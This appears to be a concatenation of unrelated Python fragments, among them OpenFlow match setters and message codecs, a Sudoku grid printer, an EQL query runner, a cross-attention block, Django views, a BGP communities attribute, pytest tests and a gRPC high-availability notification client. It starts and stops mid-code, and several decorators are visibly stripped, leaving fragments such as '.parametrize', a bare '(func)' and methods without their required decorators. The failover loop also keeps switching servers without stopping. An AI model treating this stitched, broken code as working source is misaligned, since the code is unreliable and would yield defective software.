        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV4_SRC)
        self._flow.ipv4_src = ipv4_src
        self._wc.ipv4_src_mask = mask

    def set_ipv4_dst(self, ipv4_dst):
        self.set_ipv4_dst_masked(ipv4_dst, UINT32_MAX)

    def set_ipv4_dst_masked(self, ipv4_dst, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV4_DST)
        self._flow.ipv4_dst = ipv4_dst
        self._wc.ipv4_dst_mask = mask

    def set_tcp_src(self, tcp_src):
        self._wc.ft_set(ofproto.OFPXMT_OFB_TCP_SRC)
        self._flow.tcp_src = tcp_src

    def set_tcp_dst(self, tcp_dst):
        self._wc.ft_set(ofproto.OFPXMT_OFB_TCP_DST)
        self._flow.tcp_dst = tcp_dst

    def set_udp_src(self, udp_src):
        self._wc.ft_set(ofproto.OFPXMT_OFB_UDP_SRC)
        self._flow.udp_src = udp_src

    def set_udp_dst(self, udp_dst):
        self._wc.ft_set(ofproto.OFPXMT_OFB_UDP_DST)
        self._flow.udp_dst = udp_dst

    def set_sctp_src(self, sctp_src):
        self._wc.ft_set(ofproto.OFPXMT_OFB_SCTP_SRC)
        self._flow.sctp_src = sctp_src

    def set_sctp_dst(self, sctp_dst):
        self._wc.ft_set(ofproto.OFPXMT_OFB_SCTP_DST)
        self._flow.sctp_dst = sctp_dst

    def set_icmpv4_type(self, icmpv4_type):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV4_TYPE)
        self._flow.icmpv4_type = icmpv4_type

    def set_icmpv4_code(self, icmpv4_code):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV4_CODE)
        self._flow.icmpv4_code = icmpv4_code

    def set_arp_opcode(self, arp_op):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_OP)
        self._flow.arp_op = arp_op

    def set_arp_spa(self, arp_spa):
        self.set_arp_spa_masked(arp_spa, UINT32_MAX)

    def set_arp_spa_masked(self, arp_spa, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_SPA)
        self._wc.arp_spa_mask = mask
        self._flow.arp_spa = arp_spa

    def set_arp_tpa(self, arp_tpa):
        self.set_arp_tpa_masked(arp_tpa, UINT32_MAX)

    def set_arp_tpa_masked(self, arp_tpa, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_TPA)
        self._wc.arp_tpa_mask = mask
        self._flow.arp_tpa = arp_tpa

    def set_arp_sha(self, arp_sha):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_SHA)
        self._flow.arp_sha = arp_sha

    def set_arp_sha_masked(self, arp_sha, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_SHA)
        self._wc.arp_sha_mask = mask
        self._flow.arp_sha = mac.haddr_bitand(arp_sha, mask)

    def set_arp_tha(self, arp_tha):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_THA)
        self._flow.arp_tha = arp_tha

    def set_arp_tha_masked(self, arp_tha, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ARP_THA)
        self._wc.arp_tha_mask = mask
        self._flow.arp_tha = mac.haddr_bitand(arp_tha, mask)

    def set_ipv6_src(self, src):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_SRC)
        self._flow.ipv6_src = src

    def set_ipv6_src_masked(self, src, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_SRC)
        self._wc.ipv6_src_mask = mask
        self._flow.ipv6_src = [(x & y) for (x, y) in zip(src, mask)]

    def set_ipv6_dst(self, dst):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_DST)
        self._flow.ipv6_dst = dst

    def set_ipv6_dst_masked(self, dst, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_DST)
        self._wc.ipv6_dst_mask = mask
        self._flow.ipv6_dst = [(x & y) for (x, y) in zip(dst, mask)]

    def set_ipv6_flabel(self, flabel):
        self.set_ipv6_flabel_masked(flabel, UINT32_MAX)

    def set_ipv6_flabel_masked(self, flabel, mask):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_FLABEL)
        self._wc.ipv6_flabel_mask = mask
        self._flow.ipv6_flabel = flabel

    def set_icmpv6_type(self, icmpv6_type):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV6_TYPE)
        self._flow.icmpv6_type = icmpv6_type

    def set_icmpv6_code(self, icmpv6_code):
        self._wc.ft_set(ofproto.OFPXMT_OFB_ICMPV6_CODE)
        self._flow.icmpv6_code = icmpv6_code

    def set_ipv6_nd_target(self, target):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_ND_TARGET)
        self._flow.ipv6_nd_target = target

    def set_ipv6_nd_sll(self, ipv6_nd_sll):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_ND_SLL)
        self._flow.ipv6_nd_sll = ipv6_nd_sll

    def set_ipv6_nd_tll(self, ipv6_nd_tll):
        self._wc.ft_set(ofproto.OFPXMT_OFB_IPV6_ND_TLL)
        self._flow.ipv6_nd_tll = ipv6_nd_tll

    def set_mpls_label(self, mpls_label):
        self._wc.ft_set(ofproto.OFPXMT_OFB_MPLS_LABEL)
        self._flow.mpls_label = mpls_label

    def set_mpls_tc(self, mpls_tc):
        self._wc.ft_set(ofproto.OFPXMT_OFB_MPLS_TC)
        self._flow.mpls_tc = mpls_tc
class SudokuCSP(CSP):
    """CSP specialization for a 9x9 Sudoku grid."""

    def to_str(self, assignment):
        """Render *assignment* (a {(row, col): digit} mapping) as an ASCII
        grid; unassigned cells appear as '_'."""
        border = '+-------+-------+-------+\n'
        parts = []
        for row in range(9):
            # Horizontal border before each band of three rows.
            if row % 3 == 0:
                parts.append(border)
            parts.append('| ')
            for col in range(9):
                cell = (row, col)
                parts.append(str(assignment[cell]) if cell in assignment else '_')
                # Vertical separator after each box of three columns.
                parts.append(' | ' if col % 3 == 2 else ' ')
            parts.append('\n')
        parts.append(border)
        return ''.join(parts)
def query(args):
    """Parse one EQL query from the CLI args and run it over an event stream."""
    # Event source: a file when given, otherwise stdin.
    events = (stream_file_events(args.file, args.format, args.encoding)
              if args.file else stream_stdin_events(args.format))

    config = {'print': True}
    if args.config:
        config.update(load_dump(args.config))

    engine = PythonEngine(config)
    with engine.schema:
        try:
            eql_query = parse_query(args.query, implied_any=True,
                                    implied_base=True)
            engine.add_query(eql_query)
        except EqlError as error:
            # Report the parse/validation failure and exit with status 2.
            print(error, file=sys.stderr)
            sys.exit(2)

    engine.stream_events(events, finalize=False)
    engine.finalize()
class bundle_add_msg(message):
    """OpenFlow 1.4 bundle-add message (loxigen-generated wire codec style;
    Python-2 str payloads).

    NOTE(review): ``unpack(reader)`` had no decorator; in this generated
    style it is a staticmethod, restored here.
    """
    version = 5
    type = 34

    def __init__(self, xid=None, bundle_id=None, flags=None, data=None):
        # Original branched `if x != None` per field; same defaults, tidier.
        self.xid = xid
        self.bundle_id = bundle_id if bundle_id is not None else 0
        self.flags = flags if flags is not None else 0
        self.data = data if data is not None else ''

    def pack(self):
        """Serialize to the wire format, patching the length field last."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # placeholder for total length
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!L', self.bundle_id))
        packed.append('\x00' * 2)  # 2 bytes of padding
        packed.append(struct.pack('!H', self.flags))
        packed.append(self.data)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)

    @staticmethod
    def unpack(reader):
        """Deserialize from a reader positioned at the message header."""
        obj = bundle_add_msg()
        _version = reader.read('!B')[0]
        assert (_version == 5)
        _type = reader.read('!B')[0]
        assert (_type == 34)
        _length = reader.read('!H')[0]
        # Restrict further reads to this message's declared length.
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        obj.bundle_id = reader.read('!L')[0]
        reader.skip(2)  # padding
        obj.flags = reader.read('!H')[0]
        obj.data = str(reader.read_all())
        return obj

    def __eq__(self, other):
        if type(self) != type(other):
            return False
        if self.xid != other.xid:
            return False
        if self.bundle_id != other.bundle_id:
            return False
        if self.flags != other.flags:
            return False
        if self.data != other.data:
            return False
        return True

    def pretty_print(self, q):
        """Render a human-readable dump via the pretty-printer *q*."""
        q.text('bundle_add_msg {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if self.xid != None:
                    q.text('%#x' % self.xid)
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('bundle_id = ')
                q.text('%#x' % self.bundle_id)
                q.text(',')
                q.breakable()
                q.text('flags = ')
                value_name_map = {1: 'OFPBF_ATOMIC', 2: 'OFPBF_ORDERED'}
                q.text(util.pretty_flags(self.flags, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('data = ')
                q.pp(self.data)
            q.breakable()
        q.text('}')
class TProtocolNoCtDialogue(Dialogue):
    """Dialogue rules for the t_protocol_no_ct test protocol."""

    # Performatives that may start a dialogue.
    INITIAL_PERFORMATIVES: FrozenSet[Message.Performative] = frozenset({TProtocolNoCtMessage.Performative.PERFORMATIVE_PT})
    # Performatives that end a dialogue.
    TERMINAL_PERFORMATIVES: FrozenSet[Message.Performative] = frozenset({TProtocolNoCtMessage.Performative.PERFORMATIVE_MT, TProtocolNoCtMessage.Performative.PERFORMATIVE_O})
    # For each performative, the set of performatives a reply may use
    # (terminal performatives map to the empty set).
    VALID_REPLIES: Dict[(Message.Performative, FrozenSet[Message.Performative])] = {TProtocolNoCtMessage.Performative.PERFORMATIVE_EMPTY_CONTENTS: frozenset({TProtocolNoCtMessage.Performative.PERFORMATIVE_EMPTY_CONTENTS}), TProtocolNoCtMessage.Performative.PERFORMATIVE_MT: frozenset(), TProtocolNoCtMessage.Performative.PERFORMATIVE_O: frozenset(), TProtocolNoCtMessage.Performative.PERFORMATIVE_PCT: frozenset({TProtocolNoCtMessage.Performative.PERFORMATIVE_MT, TProtocolNoCtMessage.Performative.PERFORMATIVE_O}), TProtocolNoCtMessage.Performative.PERFORMATIVE_PMT: frozenset({TProtocolNoCtMessage.Performative.PERFORMATIVE_MT, TProtocolNoCtMessage.Performative.PERFORMATIVE_O}), TProtocolNoCtMessage.Performative.PERFORMATIVE_PT: frozenset({TProtocolNoCtMessage.Performative.PERFORMATIVE_PT, TProtocolNoCtMessage.Performative.PERFORMATIVE_PCT, TProtocolNoCtMessage.Performative.PERFORMATIVE_PMT})}

    class Role(Dialogue.Role):
        """The two roles a participant can take in this dialogue."""
        ROLE_1 = 'role_1'
        ROLE_2 = 'role_2'

    class EndState(Dialogue.EndState):
        """Possible terminal states of the dialogue."""
        END_STATE_1 = 0
        END_STATE_2 = 1
        END_STATE_3 = 2

    def __init__(self, dialogue_label: DialogueLabel, self_address: Address, role: Dialogue.Role, message_class: Type[TProtocolNoCtMessage]=TProtocolNoCtMessage) -> None:
        # Delegate entirely to the base Dialogue; this subclass only
        # supplies the rule tables and nested Role/EndState types above.
        Dialogue.__init__(self, dialogue_label=dialogue_label, message_class=message_class, self_address=self_address, role=role)
class CrossAttentionBlock(Chain):
    """Transformer-style block: self-attention, cross-attention against a
    context tensor, and a GLU feed-forward — each wrapped in a pre-LayerNorm
    residual branch."""

    def __init__(self, embedding_dim: int, context_embedding_dim: int, context_key: str, num_heads: int=1, use_bias: bool=True, device: ((Device | str) | None)=None, dtype: (DType | None)=None) -> None:
        # Attribute assignments happen before super().__init__ builds the chain.
        self.embedding_dim = embedding_dim
        self.context_embedding_dim = context_embedding_dim
        # The cross-attention context tensor is looked up via UseContext
        # under this context name and the given key.
        self.context = 'cross_attention_block'
        self.context_key = context_key
        self.num_heads = num_heads
        self.use_bias = use_bias
        super().__init__(
            # 1) Residual self-attention branch (pre-norm).
            Residual(LayerNorm(normalized_shape=embedding_dim, device=device, dtype=dtype), SelfAttention(embedding_dim=embedding_dim, num_heads=num_heads, use_bias=use_bias, device=device, dtype=dtype)),
            # 2) Residual cross-attention branch: query = block input,
            #    key and value both come from the stored context tensor.
            Residual(LayerNorm(normalized_shape=embedding_dim, device=device, dtype=dtype), Parallel(Identity(), UseContext(context=self.context, key=context_key), UseContext(context=self.context, key=context_key)), Attention(embedding_dim=embedding_dim, num_heads=num_heads, key_embedding_dim=context_embedding_dim, value_embedding_dim=context_embedding_dim, use_bias=use_bias, device=device, dtype=dtype)),
            # 3) Residual feed-forward branch: expand to 2*4*dim, halve via
            #    GLU(GeLU), project back from 4*dim to dim.
            Residual(LayerNorm(normalized_shape=embedding_dim, device=device, dtype=dtype), Linear(in_features=embedding_dim, out_features=((2 * 4) * embedding_dim), device=device, dtype=dtype), GLU(GeLU()), Linear(in_features=(4 * embedding_dim), out_features=embedding_dim, device=device, dtype=dtype)))
def weekly_reminder_email(user, event_list, location):
    """Compose and send the weekly upcoming-events digest email for one user.

    Renders the plaintext and HTML templates with a shared context and hands
    the result to ``mailgun_send``.

    Args:
        user: recipient; ``user.email`` and ``user.username`` are used.
        event_list: events to include in the digest.
        location: location providing name, branding and the From address.

    Returns:
        Whatever ``mailgun_send`` returns for the composed message.
    """
    profile_url = urlresolvers.reverse('user_detail', args=(user.username,))
    location_name = location.name
    # Title the digest after tomorrow's local date, so a send late on one day
    # is labelled for the week being previewed. (The original computed the
    # timezone/date pair twice; once is enough.)
    current_tz = timezone.get_current_timezone()
    today_local = timezone.now().astimezone(current_tz).date()
    tomorrow_local = (today_local + datetime.timedelta(days=1))
    week_name = tomorrow_local.strftime('%B %d, %Y')
    footer = ('You are receiving this email because you requested weekly updates of upcoming events from %s. To turn them off, visit %s' % (location_name, profile_url))
    sender = location.from_email()
    subject = ((('[' + location.email_subject_prefix) + ']') + (' Upcoming events for the week of %s' % week_name))
    plaintext = get_template('emails/events_this_week.txt')
    htmltext = get_template('emails/events_this_week.html')
    domain = Site.objects.get_current().domain
    # Both renderings take the exact same context, so build the dict once
    # (the original built two identical dicts).
    context = {'user': user, 'events': event_list, 'location_name': location_name, 'location': location, 'domain': domain, 'footer': footer, 'week_name': week_name}
    text_content = plaintext.render(context)
    html_content = htmltext.render(context)
    mailgun_data = {'from': sender, 'to': user.email, 'subject': subject, 'text': text_content, 'html': html_content}
    return mailgun_send(mailgun_data)
def Home(request):
    """Render the PC index page with a paginated list of `dynamic` entries.

    NOTE(review): ``recommend``, ``qq``, ``links`` and ``banners`` are
    queried but never passed into the template context — presumably the
    template obtains them via context processors, or these are dead
    queries; verify before relying on them.
    """
    recommend = Recommend.objects.filter(is_recommend=True)[:10]
    qq = QQ.objects.all()
    links = link.objects.all()
    try:
        page = request.GET.get('page', 1)
        if (page == ''):
            page = 1
    except PageNotAnInteger:
        # NOTE(review): dict.get never raises PageNotAnInteger, so this
        # handler looks unreachable — confirm the intended validation.
        page = request.GET.get('page')
    # Cap the feed at the 500 most recent non-deleted entries, 10 per page.
    dynamicList = dynamic.objects.filter(is_delete=False)[:500]
    dynamicPage = Paginator(dynamicList, 10, request=request).page(page)
    banners = Banners.objects.first()
    return render(request, 'pc/index.html', {'dynamicPage': dynamicPage})
class TableFilter(HasPrivateTraits):
    """Base class for TraitsUI table filters.

    A filter pairs a callable predicate (``allowed``) with editing views and
    keeps its display ``name`` synchronized with its ``description()`` until
    the user renames it manually.
    """

    # Display name of the filter (editable by the user).
    name = Str('Default filter')
    # Last auto-generated name; used to detect whether the user renamed it.
    _name = Str('Default filter')
    # Human-readable description of what the filter accepts.
    desc = Str('All items')
    # Predicate deciding whether an object passes; not persisted (transient).
    allowed = Callable((lambda object: True), transient=True)
    # True when this instance acts as a template rather than a live filter.
    template = Bool(False)
    # Trait changes that must NOT trigger the auto-rename logic below.
    ignored_traits = ['_name', 'template', 'desc']
    # Modal editor view; the Help button is enabled only when the subclass's
    # 'filter_view' declares a help id.
    traits_view = View('name{Filter name}', '_', Include('filter_view'), title='Edit Filter', width=0.2, buttons=['OK', 'Cancel', Action(name='Help', action='show_help', defined_when="ui.view_elements.content['filter_view'].help_id != ''")])
    # Live-modal search dialog with find/select navigation buttons.
    searchable_view = View([[Include('search_view'), '|[]'], ['handler.status~', '|[]<>'], ['handler.find_next`Find the next matching item`', 'handler.find_previous`Find the previous matching item`', 'handler.select`Select all matching items`', 'handler.OK`Exit search`', '-<>'], '|<>'], title='Search for', kind='livemodal', width=0.25)
    # Subclasses extend these to add their own editing widgets.
    search_view = Group(Include('filter_view'))
    filter_view = Group()

    def filter(self, object):
        """Return True when *object* passes the filter predicate."""
        return self.allowed(object)

    def description(self):
        """Return the human-readable description of the filter."""
        return self.desc

    def edit(self, object):
        """Open a modal editor for this filter and return the UI result."""
        return self.edit_traits(view=self.edit_view(object), kind='livemodal')

    def edit_view(self, object):
        """Hook for subclasses; None selects the default traits view."""
        return None

    def __str__(self):
        return self.name

    def _anytrait_changed(self, name, old, new):
        # Keep the displayed name tracking the description for as long as
        # the user has not typed a custom name (name still equals the last
        # auto-generated one, or is empty).
        if ((name not in self.ignored_traits) and ((self.name == self._name) or (self.name == ''))):
            self.name = self._name = self.description()
# NOTE(review): the "@pytest.mark" prefix of this parametrize decorator
# appears to have been lost in extraction — confirm against the original.
.parametrize('missing_arg, expected_warning', [('ncol', 'ncol is a required argument'), ('nrow', 'nrow is a required argument'), ('nlay', 'nlay is a required argument'), ('xinc', 'xinc is a required argument'), ('yinc', 'yinc is a required argument'), ('zinc', 'zinc is a required argument')])
def test_default_init_deprecation(missing_arg, expected_warning):
    """Omitting any required Cube argument must emit exactly one
    DeprecationWarning that names the missing argument."""
    input_args = {'ncol': 10, 'nrow': 10, 'nlay': 2, 'xinc': 10.0, 'yinc': 10.0, 'zinc': 1.0}
    input_args.pop(missing_arg)
    with pytest.warns(DeprecationWarning, match=expected_warning) as record:
        xtgeo.Cube(**input_args)
    assert (len(record) == 1)
class DateBetweenFilter(BaseSQLAFilter, filters.BaseDateBetweenFilter):
    """SQLAlchemy admin filter matching rows whose date column falls in a
    range, always rendered with the date-range-picker widget."""

    def __init__(self, column, name, options=None, data_type=None):
        # The widget type is pinned to 'daterangepicker' regardless of the
        # data_type the caller supplied.
        super(DateBetweenFilter, self).__init__(column, name, options, data_type='daterangepicker')

    def apply(self, query, value, alias=None):
        """Restrict *query* to rows where the column lies between the two
        dates carried in *value*."""
        lower, upper = value
        column = self.get_column(alias)
        return query.filter(column.between(lower, upper))
# NOTE(review): this bare call was very likely a decorator
# ("@_PathAttribute.register_type(BGP_ATTR_TYPE_COMMUNITIES)") whose '@'
# prefix was lost in extraction — confirm against the original file.
_PathAttribute.register_type(BGP_ATTR_TYPE_COMMUNITIES)


class BGPPathAttributeCommunities(_PathAttribute):
    """BGP COMMUNITIES path attribute (RFC 1997): a flat list of 32-bit
    community values, optional and transitive."""

    # Each community is one 32-bit big-endian unsigned integer on the wire.
    _VALUE_PACK_STR = '!I'
    _ATTR_FLAGS = (BGP_ATTR_FLAG_OPTIONAL | BGP_ATTR_FLAG_TRANSITIVE)
    # Well-known community values defined by RFC 1997.
    NO_EXPORT = int('0xFFFFFF01', 16)
    NO_ADVERTISE = int('0xFFFFFF02', 16)
    NO_EXPORT_SUBCONFED = int('0xFFFFFF03', 16)
    # NOTE: name keeps the upstream spelling ("KNOW") — it is public API.
    WELL_KNOW_COMMUNITIES = (NO_EXPORT, NO_ADVERTISE, NO_EXPORT_SUBCONFED)

    def __init__(self, communities, flags=0, type_=None, length=None):
        super(BGPPathAttributeCommunities, self).__init__(flags=flags, type_=type_, length=length)
        # List of 32-bit community values carried by this attribute.
        self.communities = communities

    # NOTE(review): first parameter is ``cls`` — a @classmethod decorator
    # appears to have been stripped in extraction.
    def parse_value(cls, buf):
        """Decode *buf* into constructor kwargs: consume as many whole
        4-byte community values as the buffer holds (any trailing partial
        element is silently ignored)."""
        rest = buf
        communities = []
        elem_size = struct.calcsize(cls._VALUE_PACK_STR)
        while (len(rest) >= elem_size):
            (comm,) = struct.unpack_from(cls._VALUE_PACK_STR, six.binary_type(rest))
            communities.append(comm)
            rest = rest[elem_size:]
        return {'communities': communities}

    def serialize_value(self):
        """Encode ``self.communities`` back into wire format."""
        buf = bytearray()
        for comm in self.communities:
            bincomm = bytearray()
            msg_pack_into(self._VALUE_PACK_STR, bincomm, 0, comm)
            buf += bincomm
        return buf

    # NOTE(review): the next three take no ``self`` — @staticmethod
    # decorators appear to have been stripped in extraction.
    def is_no_export(comm_attr):
        """True when *comm_attr* is the NO_EXPORT well-known community."""
        return (comm_attr == BGPPathAttributeCommunities.NO_EXPORT)

    def is_no_advertise(comm_attr):
        """True when *comm_attr* is the NO_ADVERTISE well-known community."""
        return (comm_attr == BGPPathAttributeCommunities.NO_ADVERTISE)

    def is_no_export_subconfed(comm_attr):
        """True when *comm_attr* is NO_EXPORT_SUBCONFED."""
        return (comm_attr == BGPPathAttributeCommunities.NO_EXPORT_SUBCONFED)

    def has_comm_attr(self, attr):
        """Return True when *attr* occurs in this attribute's communities."""
        for comm_attr in self.communities:
            if (comm_attr == attr):
                return True
        return False
def test_arg_botcmd_returns_with_escaping(dummy_backend):
    """A backslash-escaped double quote inside an argument must survive the
    shell-style argument parsing and reach the command unescaped."""
    first_name = 'Err\\"'
    last_name = 'Bot'
    command = ('!returns_first_name_last_name --first-name=%s --last-name=%s' % (first_name, last_name))
    dummy_backend.callback_message(makemessage(dummy_backend, command))
    reply = dummy_backend.pop_message()
    assert reply.body == 'Err" Bot'
class TestMultiMetaMatcher(TestMetaMatcherClasses):
    """_MultiMetaMatcher must AND together the verdicts of its sub-matchers."""

    def test_true(self):
        # Ten always-true sub-matchers: the combined matcher matches.
        combined = search._MultiMetaMatcher([self._Matcher(True)] * 10)
        assert combined.match('foo')

    def test_false(self):
        # One always-false sub-matcher poisons the whole combination.
        sub_matchers = (([self._Matcher(True)] * 10) + [self._Matcher(False)])
        combined = search._MultiMetaMatcher(sub_matchers)
        assert not combined.match('foo')
# NOTE(review): the "@pytest.mark" prefix of this parametrize decorator
# appears to have been lost in extraction — confirm against the original.
.parametrize('password, expected', [('Testpassword1!', 'Testpassword1!'), (str_to_b64_str('Testpassword1!'), 'Testpassword1!')])
def test_user_create(password, expected):
    """UserCreate must accept both plain and base64-encoded passwords and
    normalize them to the plain form."""
    user = UserCreate(username='immauser', password=password, first_name='imma', last_name='user')
    assert (user.password == expected)
class EmbeddedNotificationClient(NotificationClient):
    """gRPC notification client with optional high-availability support.

    When ``server_uri`` is a comma-separated list of servers, the client
    discovers living members, wraps every stub RPC with retry/failover
    logic, and keeps the member list refreshed from a background thread.
    With a single URI it is a plain stub wrapper.
    """

    def __init__(self, server_uri: str, namespace: str=None, sender: str=None, client_id: int=None, initial_seq_num: int=None):
        super().__init__(namespace, sender)
        self.server_uri = server_uri
        # Unlimited receive size: event batches can be large.
        channel = grpc.insecure_channel(target=self.server_uri, options=[('grpc.max_receive_message_length', (- 1))])
        self.notification_stub = notification_service_pb2_grpc.NotificationServiceStub(channel)
        # Listener threads keyed by thread hash; guarded by self.lock.
        self.threads = {}
        self.lock = threading.Lock()
        self._client_id = client_id
        self._initial_seq_num = initial_seq_num
        self.list_member_interval_ms = 1000
        self.retry_interval_ms = 1000
        self.retry_timeout_ms = 10000
        server_uri_list = self.server_uri.split(',')
        if (len(server_uri_list) > 1):
            # HA mode: probe each listed server until one answers, seed the
            # living-member list from it, then start the refresher thread.
            self.living_members = []
            self.current_uri = None
            last_error = None
            for server_uri in server_uri_list:
                channel = grpc.insecure_channel(server_uri)
                notification_stub = notification_service_pb2_grpc.NotificationServiceStub(channel)
                try:
                    request = ListMembersRequest(timeout_seconds=0)
                    response = notification_stub.listMembers(request)
                    if (response.return_code == ReturnStatus.SUCCESS):
                        self.living_members = [proto_to_member(proto).server_uri for proto in response.members]
                    else:
                        raise Exception(response.return_msg)
                    self.current_uri = server_uri
                    self.notification_stub = notification_stub
                    break
                except grpc.RpcError as e:
                    last_error = e
            if (self.current_uri is None):
                raise Exception('No available server uri!') from last_error
            self.ha_change_lock = threading.Lock()
            self.ha_running = True
            self.notification_stub = self._wrap_rpcs(self.notification_stub, server_uri)
            self.list_member_thread = threading.Thread(target=self._list_members, daemon=True)
            self.list_member_thread.start()
        if (self._client_id is None):
            # First-time client: register with the server to obtain an id.
            request = RegisterClientRequest(client_meta=ClientMeta(namespace=self.namespace, sender=self.sender))
            response = self.notification_stub.registerClient(request)
            if (response.return_code == ReturnStatus.SUCCESS):
                self._client_id = response.client_id
            else:
                raise Exception(response.return_msg)
        else:
            # Reconnecting client: verify the supplied id is still known.
            request = ClientIdRequest(client_id=self._client_id)
            response = self.notification_stub.isClientExists(request)
            if (response.return_code != ReturnStatus.SUCCESS):
                # NOTE(review): message says "close" but this is the init
                # path — looks copy-pasted from close(); confirm upstream.
                raise Exception('Failed to close notification client: {}'.format(self))
            elif (not response.is_exists):
                raise Exception('Init notification client with a client id which have not registered.')
        seq_num = (0 if (self._initial_seq_num is None) else int(self._initial_seq_num))
        self.sequence_num_manager = SequenceNumberManager(seq_num)

    def _ha_wrapper(self, func):
        """Wrap one stub RPC with failover: on grpc.RpcError, switch to
        another living member and retry until success, HA shutdown, or the
        retry timeout elapses."""
        # NOTE(review): this bare expression looks like the remnant of a
        # stripped decorator (e.g. "@functools.wraps(func)") — confirm.
        (func)

        def call_with_retry(*args, **kwargs):
            current_func = getattr(self.notification_stub, func.__name__).inner_func
            start_time = (time.time_ns() / 1000000)
            failed_members = set()
            while True:
                try:
                    return current_func(*args, **kwargs)
                except grpc.RpcError:
                    logging.error('Exception thrown when calling rpc, change the connection.', exc_info=True)
                    with self.ha_change_lock:
                        # Only the caller that still points at the broken
                        # server performs the switch; others reuse it.
                        if (current_func.server_uri == self.current_uri):
                            living_members = list(self.living_members)
                            failed_members.add(self.current_uri)
                            shuffle(living_members)
                            found_new_member = False
                            for server_uri in living_members:
                                if (server_uri in failed_members):
                                    continue
                                next_uri = server_uri
                                channel = grpc.insecure_channel(next_uri)
                                notification_stub = self._wrap_rpcs(notification_service_pb2_grpc.NotificationServiceStub(channel), next_uri)
                                self.notification_stub = notification_stub
                                current_func = getattr(self.notification_stub, current_func.__name__).inner_func
                                self.current_uri = next_uri
                                found_new_member = True
                            if (not found_new_member):
                                # Everything failed: forget the blacklist,
                                # sleep, and try the whole list again.
                                logging.error('No available living members currently. Sleep and retry.')
                                failed_members.clear()
                                sleep_and_detecting_running(self.retry_interval_ms, (lambda : self.ha_running))
                # Give up when HA was disabled or the retry budget ran out.
                if ((not self.ha_running) or ((time.time_ns() / 1000000) > (start_time + self.retry_timeout_ms))):
                    if (not self.ha_running):
                        raise Exception('HA has been disabled.')
                    else:
                        raise Exception('Rpc retry timeout!')
        call_with_retry.inner_func = func
        return call_with_retry

    def _wrap_rpcs(self, stub, server_uri):
        """Replace every method on *stub* with its HA-wrapped version,
        tagging each with its name and origin server for failover checks."""
        for (method_name, method) in dict(stub.__dict__).items():
            method.__name__ = method_name
            method.server_uri = server_uri
            setattr(stub, method_name, self._ha_wrapper(method))
        return stub

    def _list_members(self):
        """Background loop: refresh the living-member list once per
        ``list_member_interval_ms`` while HA is running."""
        while self.ha_running:
            request = ListMembersRequest(timeout_seconds=int((self.list_member_interval_ms / 1000)))
            response = self.notification_stub.listMembers(request)
            if (response.return_code == ReturnStatus.SUCCESS):
                with self.ha_change_lock:
                    self.living_members = [proto_to_member(proto).server_uri for proto in response.members]
            else:
                logging.error(('Exception thrown when updating the living members: %s' % response.return_msg))
            time.sleep(int((self.list_member_interval_ms / 1000)))

    def disable_high_availability(self):
        """Stop HA retries and join the member-refresh thread (no-op when
        the client was created with a single server URI)."""
        if hasattr(self, 'ha_running'):
            self.ha_running = False
            self.list_member_thread.join()

    def close(self):
        """Deregister this client from the server, if it was registered."""
        if (self._client_id is not None):
            request = ClientIdRequest(client_id=self._client_id)
            response = self.notification_stub.deleteClient(request)
            if (response.return_code != ReturnStatus.SUCCESS):
                raise Exception('Failed to close notification client: {}'.format(self))
            logging.info('The notification client:{} has been closed.'.format(self))

    # NOTE(review): reads like an accessor — a @property decorator may have
    # been stripped in extraction; confirm against the original.
    def client_id(self):
        """Return the server-assigned client id (None if unregistered)."""
        return self._client_id

    def sequence_number(self):
        """Return the current send-sequence number."""
        return self.sequence_num_manager.get_sequence_number()

    def send_event(self, event: Event):
        """Send one event idempotently.

        The uuid is derived from (client id, sequence number) so a retried
        send is deduplicated server-side; the sequence number is only
        incremented after a successful send.
        """
        seq_num = self.sequence_num_manager.get_sequence_number()
        signature = '_'.join(['client', str(self._client_id), str(seq_num)])
        request = SendEventRequest(event=EventProto(key=event.key, value=event.value, context=event.context, namespace=self.namespace, sender=self.sender), uuid=signature, enable_idempotence=True)
        response = self.notification_stub.sendEvent(request)
        if (response.return_code == ReturnStatus.SUCCESS):
            self.sequence_num_manager.increment_sequence_number()
            return event_proto_to_event(response.event)
        else:
            raise Exception(response.return_msg)

    def register_listener(self, listener_processor: ListenerProcessor, event_keys: List[str]=None, offset: int=None) -> ListenerRegistrationId:
        """Start a daemon thread that long-polls events from *offset* and
        feeds them (optionally filtered by *event_keys*) to the processor.

        Returns a registration id usable with unregister_listener().
        """
        def list_events_from_offset(client, v, timeout_seconds: int=None):
            # One long-poll round-trip starting after offset v.
            request = ListAllEventsRequest(start_offset=v, timeout_seconds=timeout_seconds)
            response = client.notification_stub.listAllEvents(request)
            if (response.return_code == ReturnStatus.SUCCESS):
                if (response.events is None):
                    return None
                else:
                    events = []
                    for event_proto in response.events:
                        event = event_proto_to_event(event_proto)
                        events.append(event)
                    return events
            else:
                raise Exception(response.return_msg)

        def listen(client, v, p):
            # Poll until the thread's _flag is cleared by unregister_listener.
            t = threading.current_thread()
